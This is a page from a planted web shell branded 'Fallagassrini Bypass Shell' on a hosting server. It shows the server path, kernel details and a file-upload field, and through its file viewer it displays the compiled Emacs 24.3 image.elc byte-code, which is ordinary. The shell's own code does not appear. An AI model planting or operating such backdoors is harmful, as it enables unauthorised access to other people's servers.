? Fallagassrini

Fallagassrini Bypass Shell

Current Path : /usr/share/emacs/24.3/lisp/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : //usr/share/emacs/24.3/lisp/image.elc

;;; Compiled by mockbuild@buildfarm06-new.corp.cloudlinux.com on Fri Oct 11 10:12:51 2024
;;; from file /builddir/build/BUILD/emacs-24.3/lisp/image.el
;;; in Emacs version 24.3
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.


(byte-code "\300\301\302\303\304\305%\210\306\307\310\"\207" [custom-declare-group image nil "Image support." :group multimedia defalias image-refresh image-flush] 6)
#@400 Alist of (REGEXP . IMAGE-TYPE) pairs used to auto-detect image types.
When the first bytes of an image file match REGEXP, it is assumed to
be of image type IMAGE-TYPE if IMAGE-TYPE is a symbol.  If not a symbol,
IMAGE-TYPE must be a pair (PREDICATE . TYPE).  PREDICATE is called
with one argument, a string containing the image data.  If PREDICATE returns
a non-nil value, TYPE is the image's type.
(defconst image-type-header-regexps (byte-code "\302\303\304\305\306\307\310\311\312\313\314Q\315	\316\317	\320\321\260*\322B\257	\207" [incomment-re comment-re ("\\`/[	\n
 ]*\\*.*XPM.\\*/" . xpm) ("\\`P[1-6][[:space:]]+\\(?:#.*[[:space:]]+\\)*[0-9]+[[:space:]]+[0-9]+" . pbm) ("\\`GIF8[79]a" . gif) ("\\`\211PNG
\n\n" . png) ("\\`[	\n
 ]*#define \\([a-z0-9_]+\\)_width [0-9]+\n#define \\1_height [0-9]+\n\\(#define \\1_x_hot [0-9]+\n#define \\1_y_hot [0-9]+\n\\)?static \\(unsigned \\)?char \\1_bits" . xbm) ("\\`\\(?:MM\\*\\|II\\*\\)" . tiff) ("\\`[	\n
 ]*%!PS" . postscript) ("\\`\377\330" . jpeg) "\\(?:[^-]\\|-[^-]\\)" "\\(?:!--" "*-->[ 	
\n]*<\\)" "\\(?:<\\?xml[ 	
\n]*<" "*" "\\(?:!DOCTYPE[ 	
\n]*" "*\\)?" "[Ss][Vv][Gg]" svg] 15) (#$ . 714))
#@159 Alist of (REGEXP . IMAGE-TYPE) pairs used to identify image files.
When the name of an image file match REGEXP, it is assumed to
be of image type IMAGE-TYPE.
(defvar image-type-file-name-regexps '(("\\.png\\'" . png) ("\\.gif\\'" . gif) ("\\.jpe?g\\'" . jpeg) ("\\.bmp\\'" . bmp) ("\\.xpm\\'" . xpm) ("\\.pbm\\'" . pbm) ("\\.xbm\\'" . xbm) ("\\.ps\\'" . postscript) ("\\.tiff?\\'" . tiff) ("\\.svgz?\\'" . svg)) (#$ . 1918))
#@284 Alist of (IMAGE-TYPE . AUTODETECT) pairs used to auto-detect image files.
(See `image-type-auto-detected-p').

 - t      always auto-detect.
 - nil    never auto-detect.
 - maybe  auto-detect only if the image type is available
	    (see `image-type-available-p').
(defvar image-type-auto-detectable '((pbm . t) (xbm) (bmp . maybe) (gif . maybe) (png . maybe) (xpm) (jpeg . maybe) (tiff . maybe) (svg . maybe) (postscript)) (#$ . 2350))
#@330 List of locations in which to search for image files.
If an element is a string, it defines a directory to search.
If an element is a variable symbol whose value is a string, that
value defines a directory to search.
If an element is a variable symbol whose value is a list, the
value is used as a list of directories to search.
(custom-declare-variable 'image-load-path '(list (file-name-as-directory (expand-file-name "images" data-directory)) 'data-directory 'load-path) '(#$ . 2812) :type '(repeat (choice directory variable)) :initialize 'custom-initialize-delay)
#@1198 Return a suitable search path for images used by LIBRARY.

It searches for IMAGE in `image-load-path' (excluding
"`data-directory'/images") and `load-path', followed by a path
suitable for LIBRARY, which includes "../../etc/images" and
"../etc/images" relative to the library file itself, and then
in "`data-directory'/images".

Then this function returns a list of directories which contains
first the directory in which IMAGE was found, followed by the
value of `load-path'.  If PATH is given, it is used instead of

If NO-ERROR is non-nil and a suitable path can't be found, don't
signal an error.  Instead, return a list of directories as before,
except that nil appears in place of the image directory.

Here is an example that uses a common idiom to provide
compatibility with versions of Emacs that lack the variable

    ;; Shush compiler.
    (defvar image-load-path)

    (let* ((load-path (image-load-path-for-library "mh-e" "mh-logo.xpm"))
           (image-load-path (cons (car load-path)
                                  (when (boundp 'image-load-path)
(defalias 'image-load-path-for-library #[(library image &optional path no-error) "\204\306\307!\210	\204\306\310!\210\311\211	\312	!\206\313	!\311
+\n\203Y\n\320\316\321\"!\232\204Y\n\202\306\311\211\211\313!\211\204p\306\322\"\210\320\316\314!\323P!!\320\316\314!\324P!!\325\316	\"!\203\227\202\243\325\316	\"!\205\243\211+\204\306\n\203\262\n\202\306\203\300\326\327	#\210\202\306\306\327	#\210C\330\331 \206\322!!\"\244*\207" [library image image-directory-load-path image-directory parent dir error "No library specified" "No image specified" nil image-search-load-path locate-library file-name-directory directory-file-name expand-file-name "../" file-name-as-directory "images" "Cannot find library %s in load-path" "../../etc/images" "../etc/images" file-exists-p message "Could not find image %s for library %s" delete copy-sequence img data-directory d2ei d1ei library-name no-error path load-path] 6 (#$ . 3389)])
#@122 Value is non-nil if DATA, a string, consists of JFIF image data.
We accept the tag Exif because that is the same format.
(defalias 'image-jpeg-p #[(data) "\305\306\307\217\211\205\310\305\311\312\n	#,\205\313\314\215\207" [data start string regexp inhibit-changing-match-data nil (string-to-unibyte data) ((error)) "\\`\377\330" t string-match jfif (byte-code "G\306	\nW\205n	H\307U\204\310\311\312\"\210	T\211\306\\\nY\203(\310\311\312\"\210\313	TH\314\"	\306\\H\\	H\315Y\203d\316X\203d\310\311\317	\211\f\\\n^O\312\320\321
#,\"\210\322	\323\f#*\202*\207" [data i len code nbytes start 2 255 throw jfif nil lsh 8 224 239 "JFIF\\|Exif" t string-match + 1 string regexp inhibit-changing-match-data] 8)] 5 (#$ . 5642)])
#@129 Determine the image type from image data DATA.
Value is a symbol specifying the image type or nil if type cannot
be determined.
(defalias 'image-type-from-data #[(data) "\306\n\203L\n@@\n@A9\203+\f
\306	\n\307\310\f\n	#,\204>:\203E@
!\203EA\211\203E\306\202H\nA*\202	*\207" [image-type-header-regexps type types image-type regexp data nil t string-match start string inhibit-changing-match-data] 4 (#$ . 6411)])
#@140 Determine the image type from data in the current buffer.
Value is a symbol specifying the image type or nil if type cannot
be determined.
(defalias 'image-type-from-buffer #[nil "\306`eb\210\203Y@@@A\306\n
\306\202UA+\202		b\210\n\205h\n\f>\205h\n+\207" [image-type-header-regexps opoint type types data image-type nil t looking-at 256 regexp inhibit-changing-match-data image-types] 5 (#$ . 6860)])
#@147 Determine the type of image file FILE from its first few bytes.
Value is a symbol specifying the image type, or nil if type cannot
be determined.
(defalias 'image-type-from-file-header #[(file) "\302!\204\303!\204\304!\2052\302!\2052\305\306!r	q\210\307\216\310\311!\210\312\311\313\314$\210\315 +\207" [file #1=#:temp-buffer file-readable-p file-name-absolute-p image-search-load-path generate-new-buffer " *temp*" ((byte-code "\301!\203\n\302!\210\301\207" [#1# buffer-name kill-buffer] 2)) set-buffer-multibyte nil insert-file-contents-literally 0 256 image-type-from-buffer] 5 (#$ . 7377)])
#@136 Determine the type of image file FILE from its name.
Value is a symbol specifying the image type, or nil if type cannot
be determined.
(defalias 'image-type-from-file-name #[(file) "\302\211\303\304\215\206*\207" [first type nil found (byte-code "\306\211\205B\n@\211@\306\f\307
\f#,\203:	A\204-\311!\203:\312\313\"\210\nA\211\204\306*\207" [image-type-file-name-regexps elem --dolist-tail-- file start string nil t string-match image-type-available-p throw found regexp inhibit-changing-match-data type first] 5)] 2 (#$ . 7996)])
#@391 Determine and return image type.
SOURCE is an image file name or image data.
Optional TYPE is a symbol describing the image type.  If TYPE is omitted
or nil, try to determine the image type from its first few bytes
of image data.  If that doesn't work, and SOURCE is a file name,
use its file extension as image type.
Optional DATA-P non-nil means SOURCE is a string containing image data.
(defalias 'image-type #[(source &optional type data-p) "\204	;\204\304\305	\"\210\n\204.\203\306	!\202%\307	!\206%\310	!\211\204.\304\311!\210\n\312\303!\2056>\204?\304\313\n\"\210\n\207" [data-p source type image-types error "Invalid image file name `%s'" image-type-from-data image-type-from-file-header image-type-from-file-name "Cannot determine image type" boundp "Invalid image type `%s'"] 4 (#$ . 8575)])
(byte-code "\302\303!\203\304\305\303\306#\210\307\305\303\310#\210\311\312\313\306#\210\314\306\211\203>	@\312N\2037\313N\2047\315\313\312N#\210	A\211\204 *\316\312\313\310#\207" [prop --dolist-tail-- fboundp image-metadata defalias image-extension-data nil make-obsolete "24.1" defvaralias image-library-alist dynamic-library-alist (saved-value saved-variable-comment) put make-obsolete-variable] 6)
#@95 Return non-nil if image type TYPE is available.
Image types are symbols like `xbm' or `jpeg'.
(defalias 'image-type-available-p #[(type) "\301\302!\205	\302!\207" [type fboundp init-image-library] 2 (#$ . 9815)])
#@433 Return t if the current buffer contains an auto-detectable image.
This function is intended to be used from `magic-fallback-mode-alist'.

The buffer is considered to contain an auto-detectable image if
its beginning matches an image type in `image-type-header-regexps',
and that image type is present in `image-type-auto-detectable' with a
non-nil value.  If that value is non-nil, but not t, then the image type
must be available.
(defalias 'image-type-auto-detected-p #[nil "\303 \211\205	\236A\211\205\n\304=\206\305!*\207" [type image-type-auto-detectable auto image-type-from-buffer t image-type-available-p] 3 (#$ . 10037)])
#@780 Create an image.
FILE-OR-DATA is an image file name or image data.
Optional TYPE is a symbol describing the image type.  If TYPE is omitted
or nil, try to determine the image type from its first few bytes
of image data.  If that doesn't work, and FILE-OR-DATA is a file name,
use its file extension as image type.
Optional DATA-P non-nil means FILE-OR-DATA is a string containing image data.
Optional PROPS are additional image attributes to assign to the image,
like, e.g. `:mask MASK'.
Value is the image created, or nil if images of type TYPE are not supported.

Images should not be larger than specified by `max-image-size'.

Image file names that are not absolute are searched for in the
"images" sub-directory of `data-directory' and
`x-bitmap-file-path' (in that order).
(defalias 'create-image #[(file-or-data &optional type data-p &rest props) "\304	\n#\305	!\205\306\307\310	\n\203\311\202\312\257\"\207" [file-or-data type data-p props image-type image-type-available-p append image :type :data :file] 6 (#$ . 10685)])
#@640 Put image IMAGE in front of POS in the current buffer.
IMAGE must be an image created with `create-image' or `defimage'.
IMAGE is displayed by putting an overlay into the current buffer with a
`before-string' STRING that has a `display' property whose value is the
image.  STRING is defaulted if you omit it.
The overlay created will have the `put-image' property set to t.
POS may be an integer or marker.
AREA is where to display the image.  AREA nil or omitted means
display it in the text area, a value of `left-margin' means
display it in the left marginal area, a value of `right-margin'
means display it in the right marginal area.
(defalias 'put-image #[(image pos &optional string area) "\204\306p\n\242\302=\204\307\310\n\"\210\203#\311>\204#\307\312\"\210\313!\314\f\211	#\2044\n\2029\315D\nD\316\317G\320
%\210\321\322\323#\210\321\324#\210+\207" [string buffer image area pos prop "x" error "Not an image: %s" (left-margin right-margin) "Invalid area %s" copy-sequence make-overlay margin put-text-property 0 display overlay-put put-image t before-string overlay] 6 (#$ . 11734)])
#@766 Insert IMAGE into current buffer at point.
IMAGE is displayed by inserting STRING into the current buffer
with a `display' property whose value is the image.  STRING
defaults to a single space if you omit it.
AREA is where to display the image.  AREA nil or omitted means
display it in the text area, a value of `left-margin' means
display it in the left marginal area, a value of `right-margin'
means display it in the right marginal area.
SLICE specifies slice of IMAGE to insert.  SLICE nil or omitted
means insert whole image.  SLICE is a list (X Y WIDTH HEIGHT)
specifying the X and Y positions and WIDTH and HEIGHT of image area
to insert.  A float value 0.0 - 1.0 means relative to the width or
height of the image; integer values are taken as pixel values.
(defalias 'insert-image #[(image &optional string area slice) "\204\305	\242\301=\204\306\307	\"\210\n\203!\n\310>\204!\306\311\n\"\210\n\203.\312\nD	D\2023\301	AB`c\210\313`\314\f\203H\304\fB	D\202I	\315BB#)\207" [string image area start slice " " error "Not an image: %s" (left-margin right-margin) "Invalid area %s" margin add-text-properties display (rear-nonsticky (display))] 6 (#$ . 12865)])
#@488 Insert IMAGE into current buffer at point.
IMAGE is displayed by inserting STRING into the current buffer
with a `display' property whose value is the image.  The default
STRING is a single space.
AREA is where to display the image.  AREA nil or omitted means
display it in the text area, a value of `left-margin' means
display it in the left marginal area, a value of `right-margin'
means display it in the right marginal area.
The image is automatically split into ROWS x COLS slices.
(defalias 'insert-sliced-image #[(image &optional string area rows cols) "\204\306	\242\301=\204\307\310	\"\210\n\203!\n\311>\204!\307\312\n\"\210\n\203.\313\nD	D\2023\301	AB\314\315\206:\316\245\317\320\f\206B\316\245\321W\205\222\322W\203`c\210\323`\324\325
\257	D\326BB#\210\\)\202Q\327
\\\330\331\332\333#c\210\202J,\207" [string image area cols rows dy " " error "Not an image: %s" (left-margin right-margin) "Invalid area %s" margin 0.0 1.0001 1 0.0 1.0001 1.0 1.0 add-text-properties display slice (rear-nonsticky (display)) 0.0 propertize "\n" line-height t y dx x start] 9 (#$ . 14053)])
#@170 Remove images between START and END in BUFFER.
Remove only images that were put in BUFFER with calls to `put-image'.
BUFFER nil or omitted means use the current buffer.
(defalias 'remove-images #[(start end &optional buffer) "\204p\305	\n\"\211\205&@\306\f\307\"\203\310\f!\210)A\211\204\311)\207" [buffer start end overlays overlay overlays-in overlay-get put-image delete-overlay nil] 4 (#$ . 15199)])
(defalias 'image-search-load-path #[(file &optional path) "\204	\306\211\211\204^:\203^@\211;\203)\307\310
\f\"\211\203X\313A\202\f\205c\n+\207" [path image-load-path filename found element file nil file-readable-p expand-file-name boundp image-search-load-path t] 5])
#@774 Find an image, choosing one of a list of image specifications.

SPECS is a list of image specifications.

Each image specification in SPECS is a property list.  The contents of
a specification are image type dependent.  All specifications must at
least contain the properties `:type TYPE' and either `:file FILE' or
`:data DATA', where TYPE is a symbol specifying the image type,
e.g. `xbm', FILE is the file to load the image from, and DATA is a
string containing the actual image data.  The specification whose TYPE
is supported, and FILE exists, is used to construct the image
specification to be returned.  Return nil if no specification is

The image is looked for in `image-load-path'.

Image files should not be larger than specified by `max-image-size'.
(defalias 'find-image #[(specs) "\306	\203P\204P	@\307\n\310\"\307\n\311\"\307\n\312\"\306\313!\203I
!\211\203I\300\315\316\n!\312#B\202I\f\203I\300\nB	A-\202)\207" [image specs spec type data file nil plist-get :type :data :file image-type-available-p image-search-load-path plist-put copy-sequence found] 5 (#$ . 16009)])
#@721 Define SYMBOL as an image.

SPECS is a list of image specifications.  DOC is an optional
documentation string.

Each image specification in SPECS is a property list.  The contents of
a specification are image type dependent.  All specifications must at
least contain the properties `:type TYPE' and either `:file FILE' or
`:data DATA', where TYPE is a symbol specifying the image type,
e.g. `xbm', FILE is the file to load the image from, and DATA is a
string containing the actual image data.  The first image
specification whose TYPE is supported, and FILE exists, is used to
define SYMBOL.


   (defimage test-image ((:type xpm :file "~/test1.xpm")
                         (:type xbm :file "~/test1.xbm")))
(defalias 'defimage '(macro . #[(symbol specs &optional doc) "\303\304\305	DD\nF\207" [symbol specs doc defvar find-image quote] 5 (#$ . 17150)]))
(put 'defimage 'doc-string-elt 3)
#@41 List of supported animated image types.
(defconst image-animated-types '(gif) (#$ . 18058))
#@405 Return non-nil if IMAGE can be animated.
To be capable of being animated, an image must be of a type
listed in `image-animated-types', and contain more than one
sub-image, with a specified animation delay.  The actual return
value is a cons (NIMAGES . DELAY), where NIMAGES is the number
of sub-images in the animated image and DELAY is the delay in
seconds until the next sub-image should be displayed.
(defalias 'image-animated-p #[(image) "\305A\306\"	>\2053\307!\305\n\310\"\305\n\304\"\2052\311V\2052\f\247\2052\f\312W\203/\313\fB+\207" [image image-animated-types metadata images delay plist-get :type image-metadata count 1 0 0.1] 3 (#$ . 18157)])
#@336 Start animating IMAGE.
Animation occurs by destructively altering the IMAGE spec list.

With optional INDEX, begin animating from that animation frame.
LIMIT specifies how long to animate the image.  If omitted or
nil, play the animation until the end.  If t, loop forever.  If a
number, play until that number of seconds has elapsed.
(defalias 'image-animate #[(image &optional index limit) "\305!\306\211\205&\307!\211\203\310	!\210\311\312\306\313\206 \314\n@\314\f&*\207" [image timer animation index limit image-animated-p nil image-animate-timer cancel-timer run-with-timer 0.2 image-animate-timeout 0] 10 (#$ . 18833)])
#@45 Return the animation timer for image IMAGE.
(defalias 'image-animate-timer #[(image) "\304\n\203*\n@\nA	\305H\306=\203%	\307H\242=\203%\304\211\202\304\202	*\207" [timer-list timer tail image nil 5 image-animate-timeout 6] 3 (#$ . 19478)])
#@438 Display animation frame N of IMAGE.
N=0 refers to the initial animation frame.
COUNT is the total number of frames in the animation.
TIME-ELAPSED is the total time that has elapsed since
`image-animate-start' was called.
LIMIT determines when to stop.  If t, loop forever.  If nil, stop
 after displaying the last animation frame.  Otherwise, stop
 after LIMIT seconds have elapsed.
The minimum delay between successive frames is 0.01s.
(defalias 'image-animate-timeout #[(image n count time-elapsed limit) "\306A\307	#\210\310 \210	T\311 \312!\313A\n\311 [#\314]\315	Y\2034\2032\316\2024\317\f\\\247\203FY
?\205Y\320\f\315\321	&,\207" [image n time animation delay done plist-put :index force-window-update float-time image-animated-p + 0.01 nil 0 t run-with-timer image-animate-timeout count limit time-elapsed] 9 (#$ . 19740)])
#@225 Return a list of the ImageMagick types to be treated as images, or nil.
This is the result of `imagemagick-types', including only elements
that match `imagemagick-enabled-types' and do not match
(defalias 'imagemagick-filter-types #[nil "\302\303!\205\204\f\304\207	\305=\203\304\207\306\304\307\310\303 \"\"\207" [imagemagick-enabled-types imagemagick-types-inhibit fboundp imagemagick-types nil t delq mapcar #[(type) "	>?\205\n\303=\203\207\304\305\215\207" [type imagemagick-types-inhibit imagemagick-enabled-types t found (byte-code "\304\211\2030\n@\2119\203	=\202!	;\203)\305	\306!\"\203)\307\310\"\210\nA\211\204\304*\304\207" [imagemagick-enabled-types enable --dolist-tail-- type nil string-match symbol-name throw found] 5)] 2]] 5 (#$ . 20616)])
#@177 File extension regexp for ImageMagick files, if any.
This is the extension installed into `auto-mode-alist' and
`image-type-file-name-regexps' by `imagemagick-register-types'.
(defvar imagemagick--file-regexp nil (#$ . 21438))
#@513 Register file types that can be handled by ImageMagick.
This function is called at startup, after loading the init file.
It registers the ImageMagick types returned by `imagemagick-filter-types'.

Registered image types are added to `auto-mode-alist', so that
Emacs visits them in Image mode.  They are also added to
`image-type-file-name-regexps', so that the `image-type' function
recognizes these files as having image type `imagemagick'.

If Emacs is compiled without ImageMagick support, this does nothing.
(defalias 'imagemagick-register-types #[nil "\306\307!\205b\310\311\312 \"\211\205\313\314!\315Q\n\316B\235@\n\317B
\235@	\2048\320\f\"\320
\"\202^\f\203C\f	\240\210\202I	\316BB\203V	\240\210\202^\321\305	\317B\322#\210	\211,\207" [types re imagemagick--file-regexp auto-mode-alist ama-elt image-type-file-name-regexps fboundp imagemagick-types mapcar #[(type) "\301!\227\207" [type symbol-name] 2] imagemagick-filter-types "\\." regexp-opt "\\'" image-mode imagemagick delete add-to-list t itfnr-elt] 5 (#$ . 21672)])
(byte-code "\300\301\302\303\304\305\306\307\310\311\312\313\314\315&
\210\323 \210\324\315!\207" [custom-declare-variable imagemagick-types-inhibit '(C HTML HTM INFO M TXT PDF) "List of ImageMagick types that should never be treated as images.\nThis should be a list of symbols, each of which should be one of\nthe ImageMagick types listed by `imagemagick-types'.  The listed\nimage types are not registered by `imagemagick-register-types'.\n\nIf the value is t, inhibit the use of ImageMagick for images.\n\nIf you change this without using customize, you must call\n`imagemagick-register-types' afterwards.\n\nIf Emacs is compiled without ImageMagick support, this variable\nhas no effect." :type (choice (const :tag "Support all ImageMagick types" nil) (const :tag "Disable all ImageMagick types" t) (repeat symbol)) :initialize custom-initialize-default :set #[(symbol value) "\302	\"\210\303 \207" [symbol value set-default imagemagick-register-types] 3] :version "24.3" :group image imagemagick-enabled-types '(3FR ART ARW AVS BMP BMP2 BMP3 CAL CALS CMYK CMYKA CR2 CRW CUR CUT DCM DCR DCX DDS DJVU DNG DPX EXR FAX FITS GBR GIF GIF87 GRB HRZ ICB ICO ICON J2C JNG JP2 JPC JPEG JPG JPX K25 KDC MIFF MNG MRW MSL MSVG MTV NEF ORF OTB PBM PCD PCDS PCL PCT PCX PDB PEF PGM PICT PIX PJPEG PNG PNG24 PNG32 PNG8 PNM PPM PSD PTIF PWP RAF RAS RBG RGB RGBA RGBO RLA RLE SCR SCT SFW SGI SR2 SRF SUN SVG SVGZ TGA TIFF TIFF64 TILE TIM TTF UYVY VDA VICAR VID VIFF VST WBMP WPG X3F XBM XC XCF XPM XV XWD YCbCr YCbCrA YUV) "List of ImageMagick types to treat as images.\nEach list element should be a string or symbol, representing one\nof the image types returned by `imagemagick-types'.  If the\nelement is a string, it is handled as a regexp that enables all\nmatching types.\n\nThe value of `imagemagick-enabled-types' may also be t, meaning\nto enable all types that ImageMagick supports.\n\nThe variable `imagemagick-types-inhibit' overrides this variable.\n\nIf you change this without using customize, you must call\n`imagemagick-register-types' afterwards.\n\nIf Emacs is compiled without ImageMagick support, this variable\nhas no effect." (choice (const :tag "Support all ImageMagick types" t) (const :tag "Disable all ImageMagick types" nil) (repeat :tag "List of types" (choice (symbol :tag "type") (regexp :tag "regexp")))) #[(symbol value) "\302	\"\210\303 \207" [symbol value set-default imagemagick-register-types] 3] imagemagick-register-types provide] 14)

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net